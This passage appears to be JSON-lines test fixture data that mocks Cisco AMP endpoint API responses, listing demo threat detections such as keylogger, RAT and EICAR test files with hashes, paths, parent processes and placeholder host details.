Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694926","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":760000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:04:06+00:00","event_type_id":1090519104,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":928000000,"date":"2021-01-15T10:04:06+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe","attacked_module":"C:\\Program Files\\Mozilla Firefox\\xul.dll","base_address":"0x7D1E0000","suspicious_files":[""],"indicators":[{"tactics":["TA0009"],"severity":"medium","description":"DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.","short_description":"Dealply adware detected","id":"44cfe1c4-3dc4-4619-be6b-88c9d69c2a97","techniques":["T1185"]}]}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055321020891000,"timestamp":1610705042,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:04:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055321020891148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s234","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s234","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255571142902000,"timestamp":1610705040,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:04:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255571142901779","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055308135989000,"timestamp":1610705039,"timestamp_nanoseconds":416000000,"date":"2021-01-15T10:03:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055308135989259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":354000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255523898262000,"timestamp":1610705029,"timestamp_nanoseconds":26000000,"date":"2021-01-15T10:03:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255523898261522","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055260891349000,"timestamp":1610705028,"timestamp_nanoseconds":744000000,"date":"2021-01-15T10:03:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055260891349000","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055248006447000,"timestamp":1610705025,"timestamp_nanoseconds":103000000,"date":"2021-01-15T10:03:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055248006447111","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1j4","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1j4","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":119000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512518","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":72000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512517","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055222236643000,"timestamp":1610705019,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:03:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055222236643332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1uc","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1uc","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055217941676000,"timestamp":1610705018,"timestamp_nanoseconds":243000000,"date":"2021-01-15T10:03:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055217941676035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255468063687000,"timestamp":1610705016,"timestamp_nanoseconds":920000000,"date":"2021-01-15T10:03:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255468063686673","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255420819046000,"timestamp":1610705005,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:03:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255420819046416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395959000600,"timestamp":1610704997,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win32.DemoMal.Rat.Client","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704997,"start_date":"2021-01-15T10:03:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900"},"parent":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} 